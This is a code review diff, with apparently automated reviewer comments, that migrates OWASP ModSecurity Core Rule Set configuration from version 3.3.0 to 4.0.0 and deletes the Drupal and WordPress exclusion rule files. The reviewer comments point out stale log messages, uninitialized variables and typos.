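Review bot: Rules 901150 and 901152 are removed, so `tx.do_reput_block` and `tx.reput_block_duration` no longer receive a default in this file; if any rule outside it still reads either variable it now runs against an unset value, which is worth a grep before merging. Separately, the new 901171 (`restricted_headers_extended`) is placed between 901165 and 901167 while the new 901169 follows it, so ids in this section are no longer monotonic and nothing marks 901166 (the removed `static_extensions` default) as retired; either renumber 901171 into the gap or add `# 901166 (static_extensions) retired in 4.0, do not reuse` so the hole is not reoccupied by accident. The `|utf-8| |iso-8859-1| ...` form now used for `allowed_request_content_type_charset` matches the delimiter style of `allowed_request_content_type`, which is a welcome consistency fix, but the header comment above 901168 still only names the crs-setup.conf rule and could note the format change.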
@@ -253,12 +262,13 @@ SecAction \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.anomaly_score=0',\ - setvar:'tx.anomaly_score_pl1=0',\ - setvar:'tx.anomaly_score_pl2=0',\ - setvar:'tx.anomaly_score_pl3=0',\ - setvar:'tx.anomaly_score_pl4=0',\ + ver:'OWASP_CRS/4.0.0',\ + setvar:'tx.blocking_inbound_anomaly_score=0',\ + setvar:'tx.detection_inbound_anomaly_score=0',\ + setvar:'tx.inbound_anomaly_score_pl1=0',\ + setvar:'tx.inbound_anomaly_score_pl2=0',\ + setvar:'tx.inbound_anomaly_score_pl3=0',\ + setvar:'tx.inbound_anomaly_score_pl4=0',\ setvar:'tx.sql_injection_score=0',\ setvar:'tx.xss_score=0',\ setvar:'tx.rfi_score=0',\ 
@@ -267,42 +277,35 @@ SecAction \ setvar:'tx.php_injection_score=0',\ setvar:'tx.http_violation_score=0',\ setvar:'tx.session_fixation_score=0',\ - setvar:'tx.inbound_anomaly_score=0',\ - setvar:'tx.outbound_anomaly_score=0',\ + setvar:'tx.blocking_outbound_anomaly_score=0',\ + setvar:'tx.detection_outbound_anomaly_score=0',\ setvar:'tx.outbound_anomaly_score_pl1=0',\ setvar:'tx.outbound_anomaly_score_pl2=0',\ setvar:'tx.outbound_anomaly_score_pl3=0',\ setvar:'tx.outbound_anomaly_score_pl4=0',\ - setvar:'tx.sql_error_match=0'" + setvar:'tx.anomaly_score=0'" # # -=[ Initialize collections ]=- # # Create both Global and IP collections for rules to use. -# There are some CRS rules that assume that these two collections -# have already been initiated. -# - -SecRule REQUEST_HEADERS:User-Agent "@rx ^.*$" \ - "id:901318,\ - phase:1,\ - pass,\ - t:none,t:sha1,t:hexEncode,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.ua_hash=%{MATCHED_VAR}'" +# Some plugins assume that these two collections have already +# been initialized. +# IP collection is initialized with the IP address concatened with the hashed user agent. -SecAction \ - "id:901321,\ +# Disable collection initialization by default (see rule 900130 in crs-setup.conf) +SecRule TX:ENABLE_DEFAULT_COLLECTIONS "@eq 1" \ + "id:901320,\ phase:1,\ pass,\ - t:none,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ - initcol:global=global,\ - initcol:ip=%{remote_addr}_%{tx.ua_hash},\ - setvar:'tx.real_ip=%{remote_addr}'" + ver:'OWASP_CRS/4.0.0',\ + chain" + SecRule REQUEST_HEADERS:User-Agent "@rx ^.*$" \ + "t:none,t:sha1,t:hexEncode,\ + initcol:global=global,\ + initcol:ip=%{remote_addr}_%{MATCHED_VAR}" # # -=[ Initialize Correct Body Processing ]=- 
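Review bot: In 901320 the chained `SecRule REQUEST_HEADERS:User-Agent "@rx ^.*$"` is now the only place `initcol` runs, so a request without a User-Agent header leaves both the global and ip collections uninitialized even when `TX:ENABLE_DEFAULT_COLLECTIONS` is 1, whereas the removed 901321 ran `initcol` unconditionally with an empty hash. The new comment says plugins assume these collections exist, so this gap should be documented next to the chain, e.g. `# Collections are only initialized when a User-Agent header is present; requests without one get no ip/global collection.` The removed `setvar:'tx.real_ip=%{remote_addr}'` also disappears without replacement; if anything outside this file still reads `tx.real_ip` it now sees an empty value. The new comment also misspells "concatened" (should be "concatenated").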
@@ -318,9 +321,8 @@ SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \ nolog,\ noauditlog,\ msg:'Enabling body inspection',\ - tag:'paranoia-level/1',\ ctl:forceRequestBodyVariable=On,\ - ver:'OWASP_CRS/3.3.0'" + ver:'OWASP_CRS/4.0.0'" # Force body processor URLENCODED SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \ @@ -331,7 +333,7 @@ SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \ nolog,\ noauditlog,\ msg:'Enabling forced body inspection for ASCII content',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ chain" SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \ "ctl:requestBodyProcessor=URLENCODED" 
@@ -359,57 +361,30 @@ SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \ # # We take the entropy contained in the UNIQUE_ID. We hash that variable and # take the first integer numbers out of it. Theoretically, it is possible -# there are no integers in a sha1 hash. We make sure we get two -# integer numbers by taking the last two digits from the DURATION counter -# (in microseconds). -# Finally, leading zeros are removed from the two-digit random number. -# +# but highly improbable that there are no integers in a hexEncoded sha1 hash. +# In the very rare event that two integers are not matched (due to only being +# a-f in all, or all but one positions) 901450 will not be triggered. +# Leading zeros are not removed from the two-digit random number, and are +# handled gracefullly by 901450 SecRule TX:sampling_percentage "@eq 100" \ "id:901400,\ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ skipAfter:END-SAMPLING" -SecRule UNIQUE_ID "@rx ^." \ +SecRule UNIQUE_ID "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \ "id:901410,\ phase:1,\ pass,\ - t:sha1,t:hexEncode,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'TX.sampling_rnd100=%{MATCHED_VAR}'" - -SecRule DURATION "@rx (..)$" \ - "id:901420,\ - phase:1,\ - pass,\ - capture,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'TX.sampling_rnd100=%{TX.sampling_rnd100}%{TX.1}'" - -SecRule TX:sampling_rnd100 "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \ - "id:901430,\ - phase:1,\ - pass,\ capture,\ + t:sha1,t:hexEncode,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ setvar:'TX.sampling_rnd100=%{TX.1}%{TX.2}'" -SecRule TX:sampling_rnd100 "@rx ^0([0-9])" \ - "id:901440,\ - phase:1,\ - pass,\ - capture,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'TX.sampling_rnd100=%{TX.1}'" - - # # Sampling decision # 
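Review bot: The rewritten 901410 makes the sampling number depend solely on UNIQUE_ID, and with the DURATION fallback (old 901420) gone, a request for which the engine leaves UNIQUE_ID empty would leave `TX.sampling_rnd100` unset, so 901450 never matches and the request is inspected in full; that is the safe direction, but it silently disables sampling and the new comment only covers the "fewer than two digits in the hash" case. Suggest widening the comment: `# If UNIQUE_ID is empty or its hash yields fewer than two digits, TX.sampling_rnd100 stays unset, 901450 does not fire and the request is inspected in full.` The comment also has a typo, "gracefullly" (should be "gracefully").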
@@ -430,8 +405,8 @@ SecRule TX:sampling_rnd100 "!@lt %{tx.sampling_percentage}" \ log,\ noauditlog,\ msg:'Sampling: Disable the rule engine based on sampling_percentage %{TX.sampling_percentage} and random number %{TX.sampling_rnd100}',\ - ctl:ruleEngine=Off,\ - ver:'OWASP_CRS/3.3.0'" + ctl:ruleRemoveByTag=OWASP_CRS,\ + ver:'OWASP_CRS/4.0.0'" SecMarker "END-SAMPLING" @@ -440,13 +415,13 @@ SecMarker "END-SAMPLING" # Configuration Plausibility Checks # -# Make sure executing paranoia level is not lower than paranoia level -SecRule TX:executing_paranoia_level "@lt %{tx.paranoia_level}" \ +# Make sure detection paranoia level is not lower than paranoia level +SecRule TX:detection_paranoia_level "@lt %{tx.blocking_paranoia_level}" \ "id:901500,\ phase:1,\ deny,\ status:500,\ t:none,\ log,\ - msg:'Executing paranoia level configured is lower than the paranoia level itself. This is illegal. Blocking request. Aborting',\ - ver:'OWASP_CRS/3.3.0'" + msg:'Detection paranoia level configured is lower than the paranoia level itself. This is illegal. Blocking request. Aborting',\ + ver:'OWASP_CRS/4.0.0'" diff --git a/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf b/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf deleted file mode 100644 index 2b6b1a77ed..0000000000 --- a/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf +++ /dev/null 
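Review bot: The action in 901450 changes from `ctl:ruleEngine=Off` to `ctl:ruleRemoveByTag=OWASP_CRS`, but the `msg:'Sampling: Disable the rule engine ...'` string on the line above is kept, so the log entry now describes something the rule no longer does; the wording should follow the action, e.g. `msg:'Sampling: Remove OWASP_CRS-tagged rules based on sampling_percentage %{TX.sampling_percentage} and random number %{TX.sampling_rnd100}',\`. The operational difference is also worth a comment near the rule: only rules carrying the OWASP_CRS tag are skipped for sampled-out requests, so untagged local or vendor rules keep running where previously the whole engine stopped. The enclosing rule 901450 begins outside the hunk.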
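Review bot: Rule 901500 now compares `TX:detection_paranoia_level` against `%{tx.blocking_paranoia_level}`, yet both the comment `# Make sure detection paranoia level is not lower than paranoia level` and the message `'Detection paranoia level configured is lower than the paranoia level itself. ...'` still speak of an unqualified "paranoia level", which no longer names a variable in this file. Suggest `# Make sure detection paranoia level is not lower than blocking paranoia level` and `msg:'Detection paranoia level configured is lower than the blocking paranoia level. This is illegal. Blocking request. Aborting',\` so the log line tells the operator which setting to fix.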
@@ -1,407 +0,0 @@ -# ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 -# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. -# -# The OWASP ModSecurity Core Rule Set is distributed under -# Apache Software License (ASL) version 2 -# Please see the enclosed LICENSE file for full details. -# ------------------------------------------------------------------------ - -# These exclusions remedy false positives in a default Drupal install. -# The exclusions are only active if crs_exclusions_drupal=1 is set. -# See rule 900130 in crs-setup.conf.example for instructions. - -# -# [ POLICY ] -# -# Drupal is a complex application that is hard to secure with the CRS. This set -# of exclusion rules aims to sanitise the CRS in a way that allows a default -# Drupal setup to be installed and configured without much hassle as far as -# ModSecurity and the CRS are concerned. -# -# The exclusion rules are fairly straight forward in the sense that they -# disable CRS on a set of well-known parameter fields that are often the source -# of false positives / false alarms of the CRS. This includes namely the -# session cookie, the password fields and article/node bodies. -# -# This is based on two assumptions: - You have a basic trust in your -# authenticated users who are allowed to edit nodes. - Drupal allows html -# content in nodes and it protects your users from attacks via these fields. -# -# If you think these assumptions are wrong or if you would prefer a more -# careful/secure approach, you can disable the exclusion rules handling of said -# node body false positives. Do this by placing the following directive in -# RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf. -# -# SecRuleRemoveById 9001200-9001299 -# -# This will mean the CRS remain intact for the editing of node bodies. -# -# The exclusion rules in this file work without the need to define a Drupal -# installation path prefix. 
Instead they look at the URI from the end - or -# they use regular expressions when targeting dynamic URL. This is all not -# totally foolproof. In some cases, an advanced attacker might be able to -# doctor a request in a way that one of these exclusion rules is triggered -# and the request will bypass all further inspection despite not being a -# Drupal request at all. These exclusion rules could thus be leveraged to -# disable the CRS completely. This is why these rules are off by default. -# -# The CRS rules covered by this ruleset are the rules with Paranoia Level 1 and -# 2. If you chose to run Paranoia Level 3 or 4, you will be facing additional -# false positives which you need to handle yourself. -# -# This set of exclusion rules does not cover any additional Drupal modules -# outside of core. -# -# The exclusion rules are based on Drupal 8.1.10. -# -# And finally: This set of exclusion rules is in an experimental state. If you -# encounter false positives with the basic Drupal functionality and they are -# not covered by this rule file, then please report them. The aim is to be able -# to install and run Drupal core in a seamless manner protected by -# ModSecurity / CRS up to the paranoia level 2. - - -SecRule &TX:crs_exclusions_drupal|TX:crs_exclusions_drupal "@eq 0" \ - "id:9001000,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-DRUPAL-RULE-EXCLUSIONS" - - -# [ Table of Contents ] -# -# 9001100 Session Cookie -# 9001110 Password -# 9001120 FREE for use -# 9001130 FREE for use -# 9001140 Content and Descriptions -# 9001150 FREE for use -# 9001160 Form Token -# 9001170 Text Formats and Editors -# 9001180 WYSIWYG/CKEditor Assets and Upload -# 9001190 FREE for use -# 9001200 Content and Descriptions -# -# The rule id range from 9001200 to 9001999 is reserved for future -# use (Drupal plugins / modules). 
- - -# [ Session Cookie ] -# -# Giving the session cookie a dynamic name is most unfortunate -# from a ModSecurity perspective. The rule language does not allow -# us to disable rules in a granular way for individual cookies with -# dynamic names. So we need to disable rule causing false positives -# for all cookies and their names. -# -# Rule Exclusion Session Cookie: 942450 SQL Hex Encoding Identified -# -SecAction "id:9001100,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetById=942450;REQUEST_COOKIES_NAMES,\ - ctl:ruleRemoveTargetById=942450;REQUEST_COOKIES,\ - ver:'OWASP_CRS/3.3.0'" - - -# -# [ Password ] -# -# Disable the CRS completely for all occurrences of passwords. -# -SecRule REQUEST_FILENAME "@endsWith /core/install.php" \ - "id:9001110,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:account[pass][pass1],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:account[pass][pass2],\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@endsWith /user/login" \ - "id:9001112,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass,\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@endsWith /admin/people/create" \ - "id:9001114,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass1],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass2],\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@rx /user/[0-9]+/edit$" \ - "id:9001116,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:current_pass,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass1],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass2],\ - ver:'OWASP_CRS/3.3.0'" - - -# -# [ Admin Settings (general) ] -# -# Disable known false positives for various fields used on admin pages. 
-# -# Rule Exclusion: 920271 Invalid character in request on multiple fields/paths -# Rule Exclusion: 942430 Restricted SQL Character Anomaly Detection (args) -# Disabled completely for admin/config pages -# For the people/accounts page, we disable the CRS completely for a number of -# freeform text fields. -# -SecRule REQUEST_FILENAME "@contains /admin/config/" \ - "id:9001122,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveById=942430,\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@endsWith /admin/config/people/accounts" \ - "id:9001124,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveById=920271,\ - ctl:ruleRemoveById=942440,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_cancel_confirm_body,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_password_reset_body,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_register_admin_created_body,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_register_no_approval_required_body,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_register_pending_approval_body,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_activated_body,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_blocked_body,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_canceled_body,\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@endsWith /admin/config/development/configuration/single/import" \ - "id:9001126,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveById=920271,\ - ctl:ruleRemoveById=942440,\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@endsWith /admin/config/development/maintenance" \ - "id:9001128,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveById=942440,\ - ver:'OWASP_CRS/3.3.0'" - - -# -# -# [ Content and Descriptions ] -# -# Disable known false positives for field "ids[]". 
-# -# Rule Exclusion: 942130 SQL Injection Attack: SQL Tautology Detected -# -SecRule REQUEST_FILENAME "@endsWith /contextual/render" \ - "id:9001140,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetById=942130;ARGS:ids[],\ - ver:'OWASP_CRS/3.3.0'" - - -# -# [ Form Token / Build ID ] -# -# Rule Exclusion for form_build_id: 942440 SQL Comment Sequence Detected on ... -# Rule Exclusion for form_token: 942450 SQL Hex Encoding -# Rule Exclusion for form_build_id: 942450 SQL Hex Encoding -# -# This is applied site-wide. -# -SecAction "id:9001160,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetById=942440;ARGS:form_build_id,\ - ctl:ruleRemoveTargetById=942450;ARGS:form_token,\ - ctl:ruleRemoveTargetById=942450;ARGS:form_build_id,\ - ver:'OWASP_CRS/3.3.0'" - - -# -# [ Text Formats and Editors ] -# -# Disable the CRS completely for two fields triggering many, many rules -# -# Rule Exclusion for two fields: 942440 SQL Comment Sequence Detected -# -SecRule REQUEST_FILENAME "@endsWith /admin/config/content/formats/manage/full_html" \ - "id:9001170,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:editor[settings][toolbar][button_groups],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:filters[filter_html][settings][allowed_html],\ - ver:'OWASP_CRS/3.3.0'" - - -# -# [ WYSIWYG/CKEditor Assets and Upload ] -# -# Disable the unnecessary requestBodyAccess and for binary uploads -# bigger than an arbitrary limit of 31486341 bytes. -# -# Extensive checks make sure these uploads are really legitimate. 
-# -SecRule REQUEST_METHOD "@streq POST" \ - "id:9001180,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - noauditlog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule REQUEST_FILENAME "@rx /admin/content/assets/add/[a-z]+$" \ - "chain" - SecRule REQUEST_COOKIES:/S?SESS[a-f0-9]+/ "@rx ^[a-zA-Z0-9_-]+" \ - "ctl:requestBodyAccess=Off" - -SecRule REQUEST_METHOD "@streq POST" \ - "id:9001182,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - noauditlog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule REQUEST_FILENAME "@rx /admin/content/assets/manage/[0-9]+$" \ - "chain" - SecRule ARGS:destination "@streq admin/content/assets" \ - "chain" - SecRule REQUEST_HEADERS:Content-Length "@gt 31486341" \ - "chain" - SecRule REQUEST_COOKIES:/S?SESS[a-f0-9]+/ "@rx ^[a-zA-Z0-9_-]+" \ - "ctl:requestBodyAccess=Off" - -SecRule REQUEST_METHOD "@streq POST" \ - "id:9001184,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - noauditlog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule REQUEST_FILENAME "@rx /file/ajax/field_asset_[a-z0-9_]+/[ua]nd/0/form-[a-z0-9A-Z_-]+$" \ - "chain" - SecRule REQUEST_HEADERS:Content-Length "@gt 31486341" \ - "chain" - SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)multipart/form-data" \ - "chain" - SecRule REQUEST_COOKIES:/S?SESS[a-f0-9]+/ "@rx ^[a-zA-Z0-9_-]+" \ - "ctl:requestBodyAccess=Off" - - -# -# [ Content and Descriptions ] -# -# Disable the CRS completely for node bodies and other free text fields. -# Other rules are disabled individually. -# -# Rule Exclusion for ARGS:uid[0][target_id]: 942410 SQL Injection Attack -# Rule Exclusion for ARGS:destination: 932110 RCE: Windows Command Inj. 
-# -SecRule REQUEST_FILENAME "@endsWith /node/add/article" \ - "id:9001200,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ - ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@endsWith /node/add/page" \ - "id:9001202,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ - ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@rx /node/[0-9]+/edit$" \ - "id:9001204,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ - ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\ - ctl:ruleRemoveTargetById=932110;ARGS:destination,\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@endsWith /block/add" \ - "id:9001206,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@endsWith /admin/structure/block/block-content/manage/basic" \ - "id:9001208,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:description,\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@rx /editor/filter_xss/(?:full|basic)_html$" \ - "id:9001210,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:value,\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@rx /user/[0-9]+/contact$" \ - "id:9001212,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message[0][value],\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@endsWith /admin/config/development/maintenance" \ - "id:9001214,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:maintenance_mode_message,\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@endsWith /admin/config/services/rss-publishing" \ - "id:9001216,\ - phase:2,\ - pass,\ - nolog,\ - 
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:feed_description,\ - ver:'OWASP_CRS/3.3.0'" - - -SecMarker "END-DRUPAL-RULE-EXCLUSIONS" diff --git a/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf b/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf deleted file mode 100644 index 6a7511f4c1..0000000000 --- a/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf +++ /dev/null 
@@ -1,759 +0,0 @@ -# ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 -# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. -# -# The OWASP ModSecurity Core Rule Set is distributed under -# Apache Software License (ASL) version 2 -# Please see the enclosed LICENSE file for full details. -# ------------------------------------------------------------------------ - -# These exclusions remedy false positives in a default WordPress install. -# The exclusions are only active if crs_exclusions_wordpress=1 is set. -# See rule 900130 in crs-setup.conf.example for instructions. -# -# Note that the WordPress comment field itself is currently NOT excluded -# from checking. The reason is that malicious content is regularly being -# posted to WordPress comment forms, and there have been various cases -# of XSS and even RCE vulnerabilities exploited by WordPress comments. - -SecRule &TX:crs_exclusions_wordpress|TX:crs_exclusions_wordpress "@eq 0" \ - "id:9002000,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-WORDPRESS" - -SecRule &TX:crs_exclusions_wordpress|TX:crs_exclusions_wordpress "@eq 0" \ - "id:9002001,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-WORDPRESS" - - -# -# -=[ WordPress Front-End ]=- -# - - -# -# [ Login form ] -# - -# User login password -SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ - "id:9002100,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pwd,\ - ver:'OWASP_CRS/3.3.0'" - -# Reset password -SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ - "id:9002120,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@streq resetpass" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ - 
ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" - - -# -# [ Comments ] -# - -# Post comment -SecRule REQUEST_FILENAME "@endsWith /wp-comments-post.php" \ - "id:9002130,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetById=931130;ARGS:url,\ - ver:'OWASP_CRS/3.3.0'" - - -# -# [ Gutenberg Editor ] -# Used when a user (auto)saves a post/page with Gutenberg. -# - -# Gutenberg -SecRule REQUEST_FILENAME "@rx /wp-json/wp/v[0-9]+/(?:posts|pages)" \ - "id:9002140,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:content,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:json.content,\ - ver:'OWASP_CRS/3.3.0'" - -# Gutenberg via rest_route for sites without pretty permalinks -SecRule REQUEST_FILENAME "@endsWith /index.php" \ - "id:9002141,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule &ARGS:rest_route "@eq 1" \ - "t:none,\ - nolog,\ - chain" - SecRule ARGS:rest_route "@rx ^/wp/v[0-9]+/(?:posts|pages)" \ - "t:none,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:content,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:json.content" - -# Gutenberg upload image/media -SecRule REQUEST_FILENAME "@rx /wp-json/wp/v[0-9]+/media" \ - "id:9002142,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveById=200002,\ - ctl:ruleRemoveById=200003,\ - ver:'OWASP_CRS/3.3.0'" - -# Gutenberg upload image/media via rest_route for sites without pretty permalinks -SecRule REQUEST_FILENAME "@endsWith /index.php" \ - "id:9002143,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule &ARGS:rest_route "@eq 1" \ - "t:none,\ - nolog,\ - chain" - SecRule ARGS:rest_route "@rx ^/wp/v[0-9]+/media" \ - "t:none,\ - ctl:ruleRemoveById=200002,\ - ctl:ruleRemoveById=200003" - -# -# [ Live preview ] -# Used when an administrator customizes the site and previews the result -# as a normal user. 
-# - -# Theme select -# Example: wp_customize=on&theme=twentyfifteen&customized= -# {"old_sidebars_widgets_data":{"wp_inactive_widgets":[], -# "sidebar-1":["search-2","recent-posts-2","recent-comments-2", -# "archives-2","categories-2","meta-2"]}}&nonce=XXX& -# customize_messenger_channel=preview-0 -SecRule ARGS:wp_customize "@streq on" \ - "id:9002150,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule &ARGS:action "@eq 0" \ - "t:none,\ - ctl:ruleRemoveTargetById=942200;ARGS:customized,\ - ctl:ruleRemoveTargetById=942260;ARGS:customized,\ - ctl:ruleRemoveTargetById=942300;ARGS:customized,\ - ctl:ruleRemoveTargetById=942330;ARGS:customized,\ - ctl:ruleRemoveTargetById=942340;ARGS:customized,\ - ctl:ruleRemoveTargetById=942370;ARGS:customized,\ - ctl:ruleRemoveTargetById=942430;ARGS:customized,\ - ctl:ruleRemoveTargetById=942431;ARGS:customized,\ - ctl:ruleRemoveTargetById=942460;ARGS:customized" - -# Appearance -> Widgets -> Live Preview -SecRule ARGS:wp_customize "@streq on" \ - "id:9002160,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule ARGS:action "@rx ^(?:|customize_save|update-widget)$" \ - "t:none,\ - chain" - SecRule &ARGS:action "@eq 1" \ - "t:none,\ - ctl:ruleRemoveTargetById=942200;ARGS:customized,\ - ctl:ruleRemoveTargetById=942260;ARGS:customized,\ - ctl:ruleRemoveTargetById=942300;ARGS:customized,\ - ctl:ruleRemoveTargetById=942330;ARGS:customized,\ - ctl:ruleRemoveTargetById=942340;ARGS:customized,\ - ctl:ruleRemoveTargetById=942370;ARGS:customized,\ - ctl:ruleRemoveTargetById=942430;ARGS:customized,\ - ctl:ruleRemoveTargetById=942431;ARGS:customized,\ - ctl:ruleRemoveTargetById=942460;ARGS:customized,\ - ctl:ruleRemoveTargetById=920230;ARGS:partials,\ - ctl:ruleRemoveTargetById=941320;ARGS:partials,\ - ctl:ruleRemoveTargetById=942180;ARGS:partials,\ - ctl:ruleRemoveTargetById=942200;ARGS:partials,\ 